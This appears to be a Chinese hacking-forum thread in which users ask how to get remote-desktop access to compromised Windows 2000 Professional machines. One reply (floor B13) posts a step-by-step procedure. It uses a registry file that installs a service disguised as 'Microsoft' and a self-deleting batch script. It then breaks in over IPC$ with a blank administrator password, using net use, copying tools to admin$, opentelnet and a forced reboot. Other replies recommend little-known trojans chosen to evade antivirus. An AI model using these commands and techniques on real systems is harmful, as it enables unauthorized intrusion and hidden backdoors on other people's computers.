|
 | 作者: a [tbs5201314]
 论坛用户 |
登录 |
| 我曾经扫到好多WIN2K的系统但大多都是专业版。没有终端服务。用什么方法能 给他装个3389终端服务呢。我也试过用合法的网管软件不过都没有终端实用! 请各位大虾帮忙解答。小菜先谢谢各位了 |
| 地主 发表时间: 11/24 18:05 |
| 回复: a [tbs5201314] 论坛用户 |
登录 |
|
有没有会的啊。不会的帮忙顶着啊。谢谢了 |
| B1层 发表时间: 11/25 18:46 |
 | 回复: tuzi [tuzi]  版主 |
登录 |
|
把终端服务的安装程序装到你的机子里面 然后把它传到肉鸡里面 安装 就行了 |
| B2层 发表时间: 11/25 18:50 |
| 回复: a [tbs5201314] 论坛用户 |
登录 |
|
我用的是2000专业版,怎么装终端服务啊 |
| B3层 发表时间: 11/26 06:14 |
 | 回复: zpsky001 [zpsky001] |
登录 |
|
麻烦你会的时候告诉我一声 |
| B4层 发表时间: 11/26 09:25 |
| 回复: a [tbs5201314] 论坛用户 |
登录 |
|
大家帮忙顶顶。莫非你们都会啊????? 教教我啊 |
| B5层 发表时间: 11/29 01:30 |
 | 回复: hacker521 [hacker521] 论坛用户 |
登录 |
|
我一般都没看过PRO的机可以利用3389端口进行远程访问的,只能通过控制软件来进行一些操作,难道PRO的机还可以装终端来进行访问吗,微软好象还没有设置这种功能吧 |
| B6层 发表时间: 11/29 08:04 |
| 回复: a [tbs5201314] 论坛用户 |
登录 |
|
那有没有什么工具可以和终端一样在后台使用呢? |
| B7层 发表时间: 11/29 11:24 |
| 回复: a [tbs5201314] 论坛用户 |
登录 |
|
有什么工具可以和终端服务差不多的啊?而且是后台运行那中, |
| B8层 发表时间: 11/29 11:25 |
 | 回复: lingshiyon [lingshiyon]  论坛用户 |
登录 |
|
bo2000,网络神偷这些远程控制软件都不错啊 另外好像20cn也有一个远程控制软件不错的 [此贴被 lingshiyon(lingshiyon) 在 11月29日12时59分 编辑过] |
| B9层 发表时间: 11/29 12:15 |
| 回复: a [tbs5201314] 论坛用户 |
登录 |
|
我说的是后台运行,你说的那些很容易被管理员发现的 |
| B10层 发表时间: 11/29 21:00 |
| 回复: hacker521 [hacker521] 论坛用户 |
登录 |
|
用些国外的支持后台运行的木马吧,不要那些出名的呀,不然很容易被杀掉 |
| B11层 发表时间: 11/29 22:22 |
 | 回复: iqst [iqst] 论坛用户 |
登录 |
|
pro里装终端服务几乎不可能,就好比xp home装iis一样,呵呵,放弃这个念头吧,除非你是高人!! |
| B12层 发表时间: 11/29 22:38 |
| 回复: a [tbs5201314] 论坛用户 |
登录 |
|
谁说不可能的,这个世界没有绝对不可能的事。还是相信现实吧 在win2000 Professional版中安装3389终端服务 众所周知windows2000 profassional并不支持3389终端服务,所以我们如果发现得到管理员密码的肉机是此版本,只能放弃安装终端服务的念头。但是现在我们已经可以在profassional版中安装终端服务了! 方法如下: 1. 将profassional版改变为server版 2. 安装终端服务 关于安装终端服务的细节网络中已经有许多优秀的文章,这里不再重复。 下边就说说如何将profassional版改变为server版: 原理:其实windows 2000的各个版本都使用了同样的程序、动态链接库,它们之间最大的差别是在注册表中。windows2000三合一光盘就证明了这一点。因此只要将profassional版注册表中的相关项目改为server及以上版本,就可以在profassional版中安装终端服务了。 现在3am Laboratories已经将改变win2000版本的方法做成一个非常方便使用的软件:NTSwitch,让我们可以随心所欲地快速改变版本。此软件可以在小凤居中下载到,下载地址为URL http://www.chinesehack.org/down/show.asp?id=2192&down=1 可能由于微软的压力,3am Laboratories已将此软件从其主页中删除,大家快下载吧! 远程版本变换的具体实现方法: 法1: 1 在远程肉机上运行支持图形界面的远程控制程序(如:冰河、PcAnyWhere等) 2 远程控制下,下载并运行NTSwitch改变版本 3 安装3389终端服务 此法非常方便,技术要求最低。但操作过程对方是全部可以看见的,非常危险! 法2: 1 自己将自己本地的win2000 professional改变为win2000 server版,利用注册表对比软件对比版本变换前后注册表的差别。将差别制作成一个chang.reg文件。 2 利用所得到的肉机管理员密码,开启肉机Telnet服务。 3 Telnet上肉机后,利用regedit.exe /s chang.reg 命令, 将远程注册表改变,从而实现远程win2000的版本变换。 此法需要一定的经验,但操作很安全。而且可以用“迷途vb”的方法进一步安装3389终端服务。 以下是“迷途vb”的安装3389终端服务方法 ======================== 首先我们制作开启3389的工具 先把下面的注册表内容copy一份,另存为3389.reg注册表文件 注册表内容: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] "Enabled"="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "ShutdownWithoutLogon"="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "EnableAdminTSRemote"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "TSEnabled"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] "Start"=dword:00000002 [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] "Hotkey"="1" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] "Start"=dword:00000002 "ErrorControl"=dword:00000001 "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 "ObjectName"="LocalSystem" "Type"=dword:00000010 "Description"="Microsoft" "DisplayName"="Microsoft" 再把下面的内容保存为批处理文件3389.bat 安装批处理内容: copy termsrv.exe eventlog.exe regedit.exe /s 3389.reg del 3389.reg del 3389.exe del 3389.bat 用winrar制作成exe自解压缩包 61.188.***.*** user:administrato pass:空 先使用工具letmein判断其操作系统 letmein \\ip -all -d TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了 再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾 应该没有开启了 建立ipc连接 copy工具过去 net use \\ip\ipc$ "pass" /user:name copy file \\ip\admin$\system32 用opentelnet开对方的telnet opentelnet \\ip name pass 1 99 用telnet进入 进入到对方的winnt\system32\ 目录 解压缩3389.exe 运行安装批处理3389.bat 现在我们把对方重起一下,用reboot 我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢看见了么,开启成功! |
| B13层 发表时间: 12/05 23:30 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
请问楼上的你成功过么? |
| B14层 发表时间: 12/06 01:18 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 关于没有终端服务的主机